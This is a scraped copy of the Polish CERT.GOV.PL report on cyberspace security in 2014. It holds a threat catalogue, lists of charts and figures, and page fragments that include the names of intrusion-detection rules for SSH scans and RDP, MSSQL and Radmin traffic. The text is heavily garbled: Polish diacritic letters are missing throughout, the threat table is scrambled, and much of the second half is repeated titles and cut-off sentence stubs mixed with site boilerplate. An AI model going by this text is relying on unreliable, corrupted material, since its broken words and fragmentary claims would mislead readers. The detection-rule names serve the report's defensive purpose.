CERT.GOV.PL opracowa katalog zawierajcy specyfikacj zagroe oraz podatnoci
godzcych w bezpieczestwo cyberprzestrzeni nawizujcych bezporednio do pragmatyki
funkcjonowania Zespou CERT.GOV.PL, ktry moe by wykorzystany przez podmioty przy
reagowaniu na incydenty obsugiwane w ramach wasnej instytucji.
1. DZIAANIA CELOWE
ZAGROENIA
1.1
OPROGRAMOWANIE
ZOLIWE
wirus
1.2 PRZEAMANIE
ZABEZPIECZE
nieuprawnione
logowanie
1.3 PUBLIKACJE
W SIECI INTERNET
treci
obraliwe
1.4 GROMADZENIE
INFORMACJI
skanowanie
robak
sieciowy
1.5 SABOTA
KOMPUTEROWY
1.7 CYBERTERRORYZM
ko
trojaski
wamanie na konto/ataki
sieciowe
pomawianie
(zniesawienie)
podsuch
nieuprawniona zmiana
informacji
1.6 CZYNNIK LUDZKI
2. DZIAANIA NIECELOWE
PODATNOCI
dialer
botnet
wamanie do aplikacji
naruszenie praw
autorskich
dezinformacja
inynieria
szpiegostwo
SPAM
spoeczna
nieuprawniony dostp lub
nieuprawnione wykorzystanie
informacji
atak odmowy dostpu (np. DDoS, DOS)
skasowanie danych
wykorzystanie podatnoci
w urzdzeniach
wykorzystanie podatnoci
aplikacji
naruszenie procedur
bezpieczestwa
naruszenie obowizujcych przepisw

prawnych
przestpstwa o charakterze terrorystycznym popenione

w cyberprzestrzeni
2.1 WYPADKI I
ZDARZENIA LOSOWE
awarie
sprztowe
awarie cza
awarie
(bdy oprogramowania)
2.2 CZYNNIK LUDZKI
naruszenie
procedur
bdna
zaniedbanie konfiguracja brak wiedzy
urzdzenia
naruszenia
praw
autorskich
Tabela 4. CERT.GOV.PL - katalog zagroe
CERT.GOV.PL
55 / 58

6.2. Informacje dla pozostaych uytkownikw

Celem podnoszenia bezpieczestwa systemw teleinformatycznych nie tylko
funkcjonujcych w administracji rzdowej Zesp CERT.GOV.PL prowadzi stron
www.cert.gov.pl, na ktrej publikowane s zarwno specjalistyczne informacje o istotnych
zagroeniach, podatnociach oraz aktualizacjach w popularnych i najczciej
wykorzystywanych systemach i aplikacjach, ale rwnie szereg przydatnych informacji
z zakresu bezpieczestwa systemw teleinformatycznych. Znale mona rwnie m.in.
zalecenia konfiguracyjne, przewodniki zabezpiecze i biuletyny bezpieczestwa. W ramach
publikacji zamieszczone s Raporty o stanie bezpieczestwa cyberprzestrzeni opublikowane
w poprzednich latach. Dodatkowo, na stronie www.surfujbezpiecznie.pl, ktra skierowana
jest do modszych uytkownikw zapozna si mona z dobrymi praktykami
i z 12-toma podstawowymi zasadami bezpiecznego poruszania si po sieci Internet.
Polecamy rwnie polskie wydania OUCH! 18, ktre zamieszczane s na stronie www.cert.pl.
OUCH! to cykliczny, darmowy zestaw porad bezpieczestwa dla uytkownikw
komputerw. Zawiera take krtkie, przystpne przedstawienie wybranego zagadnienia
z bezpieczestwa komputerowego wraz z list wskazwek jak mona chroni siebie, swoich
najbliszych i swoj organizacj przed zagroeniami z cyberprzestrzeni.
18
Polska wersja biuletynu ukazuje si od kwietnia 2011 w ramach wsppracy CERT Polska i SANS Institute.
OUCH jest tworzony i konsultowany przez zesp ekspertw bezpieczestwa z SANS Securing The Human.
56 / 58
CERT.GOV.PL

Spis Tabel:
Tabela 1. Tabela atakowanych portw w roku 2014 na podstawie danych z systemu ARAKISGOV .......................................................................................................................................... 13
Tabela 2. Najczciej dopasowane reguy do ruchu sieciowego widzianego przez system
ARAKIS-GOV.............................................................................................................................. 13
Tabela 3. Stan bezpieczestwa stron WWW, nalecych do administracji publicznej............ 43
Tabela 4. CERT.GOV.PL - katalog zagroe .............................................................................. 55
Spis Wykresw:
Wykres 1. Liczba zarejestrowanych zgosze oraz incydentw w poszczeglnych kwartaach
2014 roku ................................................................................................................................... 6
Wykres 2. rda incydentw zgoszenia z wykorzystywanych przez Zesp CERT.GOV.PL
systemw wspomagajcych ....................................................................................................... 7
Wykres 3. rda incydentw ustalenia wasne ...................................................................... 7
Wykres 4. rda incydentw zgoszenia podmiotw zewntrznych ..................................... 7
Wykres 5. Statystyka wybranych incydentw w roku 2014 z podziaem na kategorie ............. 8
Wykres 6. Cztery gwne typy botnetw w 2014 roku (w odniesieniu do wszystkich
zarejestrowanych incydentw w kategorii botnet) ................................................................... 9
Wykres 7. Rozkad procentowy alarmw ze wzgldu na priorytet......................................... 10
Wykres 8. Rozkad ilociowy alarmw ze wzgldu na priorytet ............................................. 10
Wykres 9. Porwnanie rozkadu alarmw w latach 2014 i 2013 ............................................. 10
Wykres 10. Rozkad procentowy rde atakw na sieci monitorowane przez system ARAKISGOV pod ktem iloci generowanych pocze ....................................................................... 11
Wykres 11. Rozkad procentowy rde atakw na sieci monitorowane przez system ARAKISGOV pod ktem unikalnych adresw IP ................................................................................... 12
Wykres 12. Statystyka publikacji na stronie cert.gov.pl w 2014 roku ..................................... 15
Wykres 13. Rozkad zainfekowanych uytkownikw ............................................................... 18
Wykres 14. Wysane informacje o podatnoci Heartbleed przez Zesp CERT.GOV.PL .......... 23
Wykres 15. Ilo incydentw klasy: inynieria spoeczna zarejestrowanych w 2014 roku...... 24
Wykres 16. Ilo wysanych informacji o podatnoci DNS ...................................................... 31
Wykres 17. Udzia procentowy typw instytucji do iloci wysanych zgosze ...................... 31
Wykres 18. Ilo wysanych informacji o podatnoci NTP ...................................................... 33
Wykres 20. Ilo wysanych informacji o podatnoci SSDP..................................................... 35
CERT.GOV.PL
57 / 58

Wykres 22. Ilo wysanych informacji o podatnoci SSDP..................................................... 37
Wykres 24. Zdolno odparcia ataku DDoS na witryn WWW na podstawie udzielonych
odpowiedzi przez instytucje na pytania i zalecenia Zespou CERT.GOV.PL ............................. 39
Wykres 25. Statystyka wykrytych podatnoci w witrynach WWW nalecych do administracji
publicznych, wedug poziomu zagroenia................................................................................ 41
Wykres 26. Procentowy rozkad najpowaniejszych bdw w witrynach WWW, nalecych
do administracji publicznej ...................................................................................................... 42
Wykres 27. Procentowy rozkad 10 najczciej wystpujcych bdw w witrynach WWW,
nalecych do administracji publicznej .................................................................................... 42
Wykres 28. Liczbowy rozkad podatnoci przeskanowanych stron z podziaem na istotno
bdw w porwnaniu z poprzednimi latami ......................................................................... 43
Spis Rysunkw
Rysunek 1. Scenariusz ataku z wykorzystaniem podatnoci DNS ............................................ 29
Rysunek 2. Odpowied otrzymana od niepoprawnie skonfigurowanego serwera DNS ......... 30
Rysunek 3. Odpowied otrzymana od poprawnie skonfigurowanego serwera DNS............... 30
Rysunek 4. Scenariusz ataku z wykorzystaniem podatnoci NTP ............................................ 32
Rysunek 5. Odpowied otrzymana od niepoprawnie skonfigurowanego serwera NTP .......... 32
Rysunek 6. Odpowied otrzymana od poprawnie skonfigurowanego serwera NTP ............... 32
Rysunek 7. Scenariusz ataku z wykorzystaniem podatnoci SSDP........................................... 34
Rysunek 8. Przykad adresu IP wykazujcego podatno SSDP ............................................... 34
Rysunek 9. Przykad poprawnie zabezpieczonego przed podatnoci SSDP adresu IP ........... 35
Rysunek 10. Scenariusz ataku z wykorzystaniem podatnoci SNMP ....................................... 36
Rysunek 11. Przykad adresu IP wykazujcego podatno SSDP ............................................. 36
Rysunek 12. Przykad poprawnie zabezpieczonego przed podatnoci SSDP adresu IP ......... 37
58 / 58
CERT.GOV.PL

Raport o Stanie Bezpieczenstwa Cyberprzestrzeni RP W 2014 Roku

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Raport o Stanie Bezpieczenstwa Cyberprzestrzeni RP W 2014 Roku

Uploaded by

Copyright:

Available Formats

CERT.GOV.

Warszawa / marzec 2015

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

CERT.GOV.PL - dane kontaktowe

Agencja Bezpieczestwa Wewntrznego

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

Rnica w liczbie zarejestrowanych zgosze oraz liczbie incydentw wynika z faktu, e cz

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

Wykres 2. rda incydentw zgoszenia z wykorzystywanych przez Zesp CERT.GOV.PL systemw

Wykres 3. rda incydentw ustalenia wasne

Wykres 4. rda incydentw zgoszenia podmiotw zewntrznych

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

Podzia zarejestrowanych incydentw w 2014 roku na poszczeglne kategorie przedstawiony

Wykres 5. Statystyka wybranych incydentw w roku 2014 z podziaem na kategorie

Dezinformacja publikowanie nieprawdziwych informacji, ktre wiadomie wprowadzaj w bd

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

Wykres 6. Cztery gwne typy botnetw w 2014 roku

W kategorii bdna konfiguracja urzdzenia uwzgldniono informacje o podatnociach oraz

1.2. Analiza alarmw na podstawie systemu ARAKIS-GOV

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

Wykres 7. Rozkad procentowy alarmw

Wykres 8. Rozkad ilociowy alarmw

Porwnujc powysze statystyki z rokiem 2013, mona zaobserwowa znaczny wzrost

Wykres 9. Porwnanie rozkadu alarmw w latach 2014 i 2013

W kontekcie alarmw o priorytecie wysokim i rednim wikszo alarmw

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

Nieznacznie rni si statystki lokalizacji geograficznej rdowych adresw IP pod ktem

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

W powyszych wykresach dotyczcych statystyk rde atakw, wystpuje element

Ataki na usug telent

Ataki na aplikacje webowe

Ataki na usug SSH

Ataki na usug RDP (zdalny pulpit)

Skanowanie w poszukiwaniu serwerw

Ataki na usug bazy danych MSSQL

Atak na usug zarzdzania rozwizania typu

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

Ataki na usug NetBIOS

Ataki na usug VNC (zdalny pulpit)

Powysza tabela obrazuje skal zainteresowania konkretnymi usugami przez zoliwe

MISC MS Terminal server request

ET POLICY RDP connection request

ET POLICY Radmin Remote Control Session Setup Initiate

WEB-IIS view source via translate header

BLEEDING-EDGE RDP connection request

ET POLICY Suspicious inbound to MSSQL port 1433

ET SCAN Potential SSH Scan

ET POLICY RDP disconnect request

ET SCAN LibSSH Based SSH Connection - Often used as a BruteForce Tool

ET SCAN Behavioral Unusually fast Terminal Server Traffic

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

1.3. Publikacje na stronie www.cert.gov.pl

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

Wykres 12. Statystyka publikacji na stronie cert.gov.pl w 2014 roku

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

2. OMWIENIE PRZYKADOWYCH ZAGROE

2.1. Energetic Bear/Dragon Fly

Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

wiadomoci typu spear phishing 8, zawierajce oprogramowanie zoliwe w postaci

W kampanii wykorzystano oprogramowanie zoliwe Remote Access Tool/Trojan(RAT)